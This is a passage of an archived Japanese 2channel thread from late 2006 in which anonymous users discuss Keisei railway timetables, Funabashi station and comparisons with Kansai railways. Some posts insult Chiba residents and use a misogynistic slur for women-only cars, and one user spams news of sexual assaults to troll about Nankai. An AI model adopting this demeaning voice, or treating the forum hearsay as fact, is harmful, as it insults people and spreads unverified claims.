その辺りで地道に利用者増やせたかも

108 :名無し野電車区:2006/12/15(金) 22:32:01 ID:FxpH+To8
>JR船橋より北に住んでる人達

京成の存在を知らない奴が半数。

109 :名無し野電車区:2006/12/15(金) 23:02:42 ID:XsX4aGE4
今朝船橋で降りてJRへ向かう途中に俺の前を歩いてた男女2人(20台前半くらい)の会話。
「つかさ、下りホームが3階になってからちょー不便じゃね?」
「そうそう、上まで行くのに時間かかるから今までだったら間に合った電車に乗れなかったりするよね。」
「これじゃキレイだけど不便になっただけじゃん。改札も上にして駅ビルからつなげればいいのに!」
「そーだよね」

一般人的には、改札やコンコースはこのまま放置プレイとの認識なの?

110 :名無し野電車区:2006/12/15(金) 23:22:56 ID:wqQdo3DA
「高架完成」ってふれこみであの日を迎えたから、そんなもんでしょ。

111 :名無し野電車区:2006/12/16(土) 00:11:12 ID:z8eiNj5N
>>108 だよね。位置関係等が似てる京急川崎はきっとそんなことないよな。
北口バスターミナル→私鉄駅、川崎ができて船橋ができない訳は?

112 :名無し野電車区:2006/12/16(土) 00:25:36 ID:ENf7D4LO
東葉が北口に接続する予定だったが
反対運動のため東海神へ変更したと聞いたが。
船橋から東海神まで徒歩5分程度、
将来は周辺開発が行われるようだがどうなることか

113 :名無し野電車区:2006/12/16(土) 09:00:38 ID:1MDMOvFy
それはデマだよ。

114 :名無し野電車区:2006/12/16(土) 20:20:09 ID:STEEtxhd
今回のダイヤ改正の実感としてマイナス評価致します。



一乗客の評価

115 :名無し野電車区:2006/12/16(土) 20:24:16 ID:Uc9Wd3YP
千葉県は日本のゴミ
千葉県は日本の恥
千葉県は日本のクズ

116 :名無し野電車区:2006/12/16(土) 22:16:46 ID:kF3qVXDM
<<115
 で、喪前は..................? to 吊られてみるテスト

117 :名無し野電車区:2006/12/17(日) 02:30:12 ID:ys4fN/s6
早期に赤電廃止したいみたいだし、運用減を見据えたダイヤなのでは?

118 :名無し野電車区:2006/12/17(日) 18:13:13 ID:ZKIlta/v
改正前は特急なんて佐倉の前後では止まりそうな走り方
だったんだから、空気輸送の快速と統合してまともな
スピードで各駅停車にするというのは、ごく普通の経営
判断だと思うが。
成田〜成田空港間以外から乗る旅客にしてみれば、
明らかな改善だからね。どうしても座りたければ、
勝田台で降りて臼井始発に乗ればよい。

119 :名無し野電車区:2006/12/17(日) 20:58:27 ID:vKe0ySNn
>>89
それは漏れが困る。京津乗換えで楽だったのに、なくなると新津からいちいち歩く羽目になるし。

120 :名無し野電車区:2006/12/19(火) 20:38:43 ID:H7DGiMl9
>>117
赤電廃止したらスピードアップできるかねぇ?。

121 :名無し野電車区:2006/12/19(火) 22:04:39 ID:LOjKus7Y
しない。
できない。
するわけがない。

122 :名無し野電車区:2006/12/21(木) 02:33:24 ID:FA3Jw7H/
>>75,>>76
首都圏のJRが方向別複々線ではなく、線路別複々線を採用せざるを
得なかった現実的な理由は、理屈としては理解できるのだけど、
長年、関西に住んでいた者が千葉に移住して総武線利用者になると、
心情的にはどうしても、線路別複々線の不便さにイライラしてしまう。

それに、線路の敷き方だけに限らず、車両その他のサービスに対しても「関西だったら…」とつい不満を抱いてしまう。
京成に関しても、つい関西の民鉄と比較して観察してしまうけど…、
この点については何も申しますまい。

123 :名無し野電車区:2006/12/21(木) 14:28:45 ID:TC2ID9Ut
俺も関西に住んでたので、ドアに化粧板貼れよとかつい思ってしまうが、
雌車がほとんど無いという一点で全て許せてしまう。

124 :名無し野電車区:2006/12/22(金) 00:23:48 ID:YmsZYgZI
実は、首都圏で一番関西的な京急と、二番目に関西的な京成は、
どちらも都内に入る前にJRの幹線に乗客の大半を取られているから、
関西的なサービスを維持できるんだが。

利用客は潰れない程度に維持できていればよい。

125 :名無し野電車区:2006/12/22(金) 01:34:17 ID:wyKRXN/q
首都圏のJRにだって、山手と京浜東北の並走区間は方向別複々線なんだが。(品川は除く)
日中だけの快速運転ではあるが、やはり便利ではある。
あの区間が線路別だったら、不便過ぎるだろ。

船橋で大半が奪われるが、そこから都心方面だって、それなりに利用者はいる。
むしろ、船橋で乗客が降りないと、今の設備じゃパンクするんじゃないかな。
船橋で客の流れが無くなったら、都心側は相応の設備にするとは思うが、高砂〜青砥とか複々線でも間に合うかどうか。

126 :名無し野電車区:2006/12/22(金) 01:42:38 ID:E8ODFsxc
京急はともかく、京成のどこが関西的なんだ。TXのほうが明らかにそれっぽい。
40年も前からトンネルの向こうと繋がってたのに、
近年になるまでそれを有効活用してなかったし、
総武快速が大攻勢をかけてるのに、かつての特急・急行は信じられない本数の少なさと停車駅の多さ。

結局はそんなことをしなくても八千代・佐倉の客を船橋まで運ぶだけでも、細々と食えるから放置してきたんだろうけど、
バブルがはじけて東葉も出来てやっと競争という概念が出来た。

そんな会社のどこが関西的なんだ?

127 :名無し野電車区:2006/12/22(金) 03:57:34 ID:t59iPU1D
何の根拠も無いのに、無理なコジツケをしてでも
自分の大好きな鉄道会社を他に優越した特別な存在
として語りたがる鉄道マニアは、どこにでもいる。

それと…
女性から肯定的に受け入れてもらうような体験に恵まれないまま
大人になっちゃった男性が、やはりヒステリックに女性専用車に
対して拒絶反応を起こしているのだろうか?
自分だって一歩間違えばそうなっていたかもしれないと思うと怖い。

128 :名無し野電車区:2006/12/22(金) 10:44:55 ID:XpdqJGRb
下がり杉

129 :名無し野電車区:2006/12/22(金) 10:54:01 ID:OJQJWlmu
本線、千葉線、JRが重なる地域が習志野にあるけど
なんであそこに駅を作らなかったの?
周囲は農地なんだけど。

130 :名無し野電車区:2006/12/22(金) 11:05:57 ID:frE81qMm
>>129
答えは自分で出しているじゃないか。「周囲は農地」。
幕張本郷駅だって、国鉄(→JR)駅が昭和56年開業、
京成駅なんて平成3年開業だぞ。

新鎌ヶ谷や東松戸みたいに、他に接続駅が無ければ新駅設置の
意味もあるが、津田沼・新津田沼・幕張本郷がすでにあるからな。

もう、冬休みだねえ。

131 :名無し野電車区:2006/12/22(金) 12:27:21 ID:dJQR4mEq
雌車雌車騒いでる連中には実際女がメスに変わる事を経験したのがいない。不思議な話。

132 :名無し野電車区:2006/12/22(金) 12:30:36 ID:9aWC1YRC
首都圏一関西的なのは新京成。二番が京急で三番が京成。

133 :名無し野電車区:2006/12/22(金) 13:08:25 ID:QRH8T6pm
近年の関西私鉄は有料特急の存在を除けば、基本的に特急と普通、及びそれを補填する急行がそれぞれ10分サイクルになっていて、乗り継ぎがわかりやすくなっている訳だが、京成のどこが関西的なんだか…
ダイヤ面では京急と京王の方がよっぽど関西的

134 :名無し野電車区:2006/12/22(金) 13:34:42 ID:AsV6hyNt
京成も南海を見習え。

135 :名無し野電車区:2006/12/22(金) 13:38:01 ID:U2LvV1nk
    ◇◆◇◆◇ 南海電鉄が申告漏れ 3年間で3億5000万円(共同通信) ◇◆◇◆◇


南海電気鉄道(大阪市中央区)が大阪国税局の税務調査を受け、2001年3月期までの3年間で約3億5000万円の
申告漏れを指摘されていたことが21日、分かった。

同国税局は、施設の減価償却費として損金計上した約1000万円について所得隠しと認定、重加算税、過少申告加算税を
含め約1億1000万円を追徴課税(更正処分)した。

関係者によると、同社は建設した施設にについて供用開始前に減価償却費として約1000万円を計上。

しかし、同国税局は「施設が供用を開始した後から計上するべきだ」などとした上で、意図的な経理操作があったとして
重加算税の対象にしたという。

また、そのほかにも資産の取得にからむ減価償却費などの計上について、経理ミスがあったとして申告漏れを指摘。
不正な経理操作はなかったとして過少申告加算税の対象にしたとみられる。

ttp://news.goo.ne.jp/news/topics/index/02122/1.html

136 :名無し野電車区:2006/12/22(金) 13:38:46 ID:U2LvV1nk
                ◆◇◆◇◆ 減損処理で当期赤字に 南海電鉄決算 ◆◇◆◇◆


                                                2006年05月12日


       南海電気鉄道が12日発表した06年3月期連結決算は、売上高が前期比2.9%減の1904億円、
      来園者が減少している遊園地「みさき公園」(大阪府岬町)などの減損処理で発生した特別損失が
      210億円に上り、当期損益は65億円の赤字になった。

                ソース:www.asahi.com/kansai/news/OSK200605120072.html


137 :名無し野電車区:2006/12/22(金) 13:39:20 ID:U2LvV1nk
(11月29日の社会面ニュース)

4少年が電車・駅で女子高生にわいせつ行為 容疑で逮捕
--------------------------------------------------------------------------------


 大阪府立高校の男子生徒3人を含む少年4人が、女子高校生に電車内などで
わいせつな行為をしたとして、府警は29日、いずれも同府岸和田市内に住む
高校3年の男子生徒(18)と会社員(17)を強制わいせつ容疑で、16、17歳の
高校1年の男子生徒2人を強制わいせつ幇助(ほうじょ)容疑で逮捕した、と発表した。
少年らは、女子生徒が電車から降りた後、便所に連れ込んでわいせつ行為を続けたという。

 少年課の調べでは、高3の男子生徒は10月11日午後10時10分ごろ、
南海みさき公園発難波行きの電車内で、同じ車両に居合わせた女子生徒を隣に座らせ、
25分にわたって体を触るなどした疑い。
女子生徒が乗り換えのため岸和田駅で下車したところ、この男子生徒と会社員の少年は
女子生徒を同駅の男子トイレに連れ込んで約10分間、わいせつな行為を続けた疑い。
高1の2人は電車内ではやし立てたり、トイレ外側で見張ったりして2人を助けた疑い。

 同課によると、女子生徒は電車内で「やめてください」などと助けを求めたが、
当時車内にいた数人の客は助けようとしなかった。
車掌や駅員も気づかなかったという。
少年4人は遊び仲間で、女子生徒とは面識がなかった。

#http://www.asahi.com/kansai/news/OSK200411300005.html

138 :名無し野電車区:2006/12/22(金) 13:39:51 ID:U2LvV1nk
       ◆◇◆◇◆  運転士と車掌が女性監禁 トイレで強制わいせつ  ◆◇◆◇◆


23歳コンパニオンをトイレに監禁、体触る

 兵庫県警有馬署は25日、強制わいせつと監禁の疑いで、南海電鉄運転士上野敦弘(34=大阪府羽曳野市)、南海電鉄車掌喜多信也(33=和歌山県橋本市)の両容疑者を逮捕した。

 調べでは、両容疑者は共謀。5月29日午後8時50分ごろ、神戸・有馬温泉のホテルで、コンパニオン女性(23)を男性トイレに連れ込み施錠、体に触るなどのわいせつ行為をした疑い。両容疑者は「合意の上だった」と容疑を否認しているという。

 両容疑者は同期入社の社員十数人と有馬温泉に宿泊。宴会場でコンパニオン数人の接待を受け、2次会でホテル内のバーに移動した。2次会ではコンパニオン数人の時間を延長して接待を受けていた。

 両容疑者は女性がトイレへ行くため席を立ったところ「ちょっと来て」と誘い、手を引っ張ってトイレに連れ込んだという。両容疑者は約40分間、女性をトイレに監禁し、わいせつな行為に及んだという。]
同僚のコンパニオン女性が席に戻ってこない女性を心配し、男子トイレを外からノックしたが、反応はなかったという。6月上旬に女性が同署に被害届を提出した。

http://osaka.nikkansports.com/news/p-on-tp6-20060726-66186.html

139 :名無し野電車区:2006/12/22(金) 13:40:31 ID:U2LvV1nk
南海の運転ミスによる情けない事故の歴史


●男里川事故…踏切でトラックと衝突して川へ転落
            後で運転士が自分の子供を抱えながら運転していたことがバレて大問題に


●羽倉崎事故…回送車両が車止めを越え更に道路向かいの仏壇屋へ特攻
            担当の入換運転士曰く「天気が良かったので空に見とれていたら(ry」


●住ノ江事故…同じく回送車両がATSを切った状態で冒進、高架下のプールにダイブ未遂
           この運転士の言い訳は「急いで帰りたかった」

140 :名無し野電車区:2006/12/22(金) 15:29:17 ID:t59iPU1D
何が気に障ったのかは、だいたいわかるけど、
強迫神経症的にレスして鬱憤晴らしをする行為も
相当にみっともないから、やめようね。

141 :名無し野電車区:2006/12/22(金) 20:30:45 ID:YtVFcNST
結論:
難解は汚物

142 :名無し野電車区:2006/12/22(金) 20:53:47 ID:XJK+cGh/
>>133
>>基本的に特急と普通、及びそれを補填する急行がそれぞれ10分サイクルになっていて、
これは調布以東に限る話だが京王が一番近いんじゃないか、
特急と準特急、急行と快速があって完全な10分サイクルにはなってないが、
関西的な10分サイクルダイヤに近い。

143 :名無し野電車区:2006/12/22(金) 23:57:06 ID:mUHOqhkY
ID:dJQR4mEq
ID:t59iPU1D

釣りはみっともないからやめましょうね♪

144 :名無し野電車区:2006/12/23(土) 08:21:05 ID:qeP2tWcM
俺は船橋で乗り換えず西船から西船橋までマタ−リ歩く。

145 :名無し野電車区:2006/12/23(土) 16:15:09 ID:PIXH+S7w
>>144
ぽつぽつとそういう利用見かけるんだよなあ。
実際どういう利用経路なの?

146 :名無し野電車区:2006/12/23(土) 16:30:54 ID:gh0o3gFT
津田沼以東から東西線とか京葉線行く貧民が使うよ。安い場合がある。特に東西線

147 :名無し野電車区:2006/12/23(土) 16:54:46 ID:xD0Ukaic
京成行くときは西船乗換えですよ
東西線利用者です。船橋で乗り換えたらJR運賃入って高いもの・・・

148 :名無し野電車区:2006/12/23(土) 18:53:34 ID:XJdRaBXy
漢なら黙って京成幕張本郷

149 :名無し野電車区:2006/12/23(土) 21:20:36 ID:IGyQLaTg
>>133
×近年の関西私鉄
○近年の京阪阪急阪神

近鉄大阪線や南海のダイヤは(ry

150 :名無し野電車区:2006/12/24(日) 00:00:07 ID:tIhOXBF4
>>146-147
なるほどね。
ていうと、京成では普通のみ停車が最寄り駅の人ってことでおk?

151 :名無し野電車区:2006/12/24(日) 02:24:15 ID:H3RmQ2wn
八千代台→新浦安
西船410
船橋460

152 :名無し野電車区:2006/12/24(日) 02:32:26 ID:H3RmQ2wn
船競・南船橋340
>>150 という事で限定はよくない。
>>148 ほとんど役に立たない。この場合

153 :名無し野電車区:2006/12/24(日) 11:38:29 ID:dCLRfbP3
特急は八千代台から各駅停車でいいじゃん。
快特と5分くらいしか変わらないと思うよ。

154 :名無し野電車区:2006/12/24(日) 11:44:16 ID:dCLRfbP3
そして、今の特急停車駅にスカイライナー停車でいいじゃん。
新高速開通後ね。

155 :名無し野電車区:2006/12/24(日) 11:45:35 ID:dCLRfbP3
今の快特停車駅だった。

156 :名無し野電車区:2006/12/24(日) 14:12:29 ID:bRjLmxhP
鹿島鉄道を潰すような京成を使わず、成田空港にはJRを使おう。

157 :名無し野電車区:2006/12/24(日) 17:13:14 ID:gHtM894R
↑ 鹿島鉄道は関鉄の子会社でつ


158 :名無し野電車区:2006/12/24(日) 17:22:16 ID:bRjLmxhP
鹿島鉄道は列記とした京成グループの企業。
銚子も以前は京成グループ。
ローカル線に冷たい京成グループより、岩泉線や只見線の維持に奮闘するJR東日本に乗りましょう。
成田エクスプレスに乗れば、その資金が岩泉線や只見線の維持に使われ、社会貢献できるよ。
京成に乗っても社会貢献は出来ません。

159 :名無し野電車区:2006/12/24(日) 18:28:13 ID:zY10SM/9
どうせひろゆきの会社に勤める荒らし要員だろw

160 :名無し野電車区:2006/12/24(日) 18:32:41 ID:gHtM894R
地元に乗客がいないのにどうやって経営を援助するんだ 馬鹿な事言わないで
要は必要なのは地元の乗客だぞ その地元が何の打つ手もないんだから・・



161 :名無し野電車区:2006/12/25(月) 12:07:00 ID:GL6hRnCQ
>>158
京成グループだった時点で終わっとる。

162 :名無し野電車区:2006/12/25(月) 15:13:54 ID:19sNSUGJ
経営破綻した千葉急行を450億で買い取った京成は神鉄道だろ!

163 :名無し野電車区:2006/12/25(月) 15:32:22 ID:O+ZU0e+M
>>162
北総未開発鉄道も行政や政治に散々振り回された路線だし、
東葉高額鉄道も隠れ京成グループだ。まだ売店は京成ストアの
ままだった?

164 :名無し野電車区:2006/12/25(月) 15:44:35 ID:8wvdQCZ8
東葉高速株をメトロに売って、鹿島鉄道を京成で買い取れ。

165 :名無し野電車区:2006/12/25(月) 17:08:29 ID:0biGd8+j
ところで東京オリンピックが実現したら都営東京駅ができそうだな。
長野にフル規格の新幹線を通した基地外国家だから
都心部での一駅延伸など余裕だろう

166 :名無し野電車区:2006/12/25(月) 18:15:21 ID:qSld5tVg
ヒント:オリンピックは大陸持ち回り

167 :名無し野電車区:2006/12/25(月) 18:20:45 ID:qSld5tVg
もひとつ、都心の100mは田舎の10km

168 :名無し野電車区:2006/12/25(月) 18:48:57 ID:0biGd8+j
ヒント:首都を落としたら可哀想という同情票

169 :名無し野電車区:2006/12/25(月) 19:13:28 ID:0biGd8+j
最近、京成って電車の遅れが多くない?

170 :名無し野電車区:2006/12/25(月) 19:21:44 ID:yeq12Fa8
今日京成使ったが
成田山の半二次元ポスターあったぞ

171 :名無し野電車区:2006/12/25(月) 19:27:13 ID:qSld5tVg
>>168で厨確定。誠に有難うございました。

172 :名無し野電車区:2006/12/25(月) 19:39:59 ID:2APJQ0O9
>164
鹿鉄は既に御用済みの鉄道でつ



173 :名無し野電車区:2006/12/25(月) 20:01:12 ID:3W4Kx0Qe
>>166-167
造っちゃったモン勝ちという説もある。
どうせ地下には流用可能な非公式の地下街路でもあるんだろ。
その際は新鎌以東200km/h運転だな。

174 :名無し野電車区:2006/12/25(月) 22:03:55 ID:eMEXHMlT
鉄道に関しては都市の100mの方が、田舎の10kmよりも有用だけどね。

175 :名無し野電車区:2006/12/25(月) 22:24:52 ID:CYeeviVY
スカイライナーより都営・京急直通の優等列車(快速特急並)の方が欲しいんだが。

176 :名無し野電車区:2006/12/25(月) 23:14:03 ID:bFV8wZj5
快速を宗吾行きにして、特急の停車駅を佐倉、公津、成田に
するべきである
営利企業なんだから、自社の開発エリアに特急を止めることは
何も恥ずかしいことではない。
ライバル南海に至っては林間田園都市に「こうや」を止めている。
大佐倉、宗吾に特急止める方が変。

177 :名無し野電車区:2006/12/25(月) 23:17:44 ID:HLcRvmlA
@スカイライナーを2本/h走らせる。
【途中停車駅】日暮里、津田沼、2ビル
※船橋停車は、JR(快速エアポート)が1本/hあるので不要。
A京急久里浜始発のエアポート快特を2本/h走らせ、停車駅を見直す。
【途中停車駅】横須賀中央、金沢文庫、上大岡、横浜、川崎、蒲田、
品川、大門、日本橋、東日本橋、浅草、押上、高砂、船橋、津田沼、
八千代台、勝田台、佐倉、成田、2ビル

何せ、今の40分サイクルのダイヤでは利用しずらいと思うので。

178 :名無し野電車区:2006/12/25(月) 23:38:52 ID:1ot67h8O
毎朝平日は通勤で使っているけど、なぜ今日は乗客が少なかったのか・・・?
月曜は他の曜日より多いんだけど・・・

学生が減ったって感じではないんだけど。
皆イブ明けでホテルから出勤なのか?w

179 :名無し野電車区:2006/12/26(火) 01:06:45 ID:aq/uyJdb
京成カードのパンダはダサいので別のキャラクターに変える

180 :名無し野電車区:2006/12/26(火) 02:47:08 ID:TPirTThm
西瓜を使えねえ!不便!日暮里、船場、成田

181 :名無し野電車区:2006/12/26(火) 02:52:08 ID:WjUl2Bij
“種別や停車駅パターンをどのように設定するのが適切なのか?”
という点について、実は京成社内でも満足のいくような突っ込んだ議論なんか
できてないのではなかろうか?
サービスに対する基本的な哲学とかは無いまま、具体的な案なんか煮え切らない
まま、船橋の高架化を契機にチョット何か新しいことやってみたいなァ…程度の
姿勢で改定しちゃったという印象。
>>176
「こうや」は有料特急だから京成の「スカイライナー」に該当するのだけど、ところが
南海高野線には京成の一般車特急に該当する列車が走っていない。だけど、南海
本線には有料特急と一般車特急の双方が設定されている。
南海は本線と、もうひとつの幹線である高野線とでは運行形態も沿線風景も全く
異なるのだけど、京成スレで南海の話題が出てくるときは、本線と高野線の違い
が考慮されないまま、京成と比較・言及されているという感じ。

182 :名無し野電車区:2006/12/26(火) 08:59:56 ID:K05BPbhS
>>173
浅草線は、それこそ'64年の東京オリンピックの前に
水路を埋めて、共同溝やら昭和通りのアンダークロスやらと
一体に作った物らしいので、上下左右をいろんな構造物に
囲まれている、らしい。

分岐線を作るには、それらを移動するコストがかかる、らしい。
でも、これを書くと、必ず「それは解決済みの問題」とレスされる。
何故なんだろう? どう解決されているのか知りたいのだが。

183 :名無し野電車区:2006/12/26(火) 11:10:16 ID:k1NRiQ2U
恐らく、例の幻の地下鉄線本の信者では?

184 :名無し野電車区:2006/12/26(火) 12:14:17 ID:APrPtg4w
>>181
高野線にも一般車(ズームカー限定)の臨時特急が設定されていたような…
もちろん、運賃だけで乗車可能。

ただ、現在は特急車が増備されたので、一般車の臨時特急じゃなくて臨時「こうや」
の設定になっていたような…

ちなみに今でもズーム・ステンレス問わずに表示幕には特急の幕が入っている。

185 :名無し野電車区:2006/12/26(火) 18:11:13 ID:Jha7gsEV
スレ違いかも試練が
11時ちょい前に津田沼行3004Fが関屋でオーバーラン
ホームの客はみんな( ゚д゚)ポカーン

186 :名無し野電車区:2006/12/27(水) 04:39:29 ID:ISUcv0oE
>178
学生が休みに入ったのはでかい。
確実に座れるからね
けど、部活の厨房攻防のバッグが激しくウゼェ

187 :名無し野電車区:2006/12/28(木) 00:44:52 ID:dvWwlDuE
>>179
折れもそのほうがいいと思う

188 :名無し野電車区:2006/12/28(木) 01:44:02 ID:3HaxwJHM
>>185
トンネルの向こうじゃ日常茶飯事だけどな

189 :名無し野電車区:2006/12/28(木) 01:48:48 ID:JtC3DakD
>>188
残念ながらこちらでも日常茶飯事です。

190 :名無し野電車区:2006/12/28(木) 09:24:54 ID:4M55njd6
>>188>>189
北総拳骨山でも狸習志野でも。

54 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)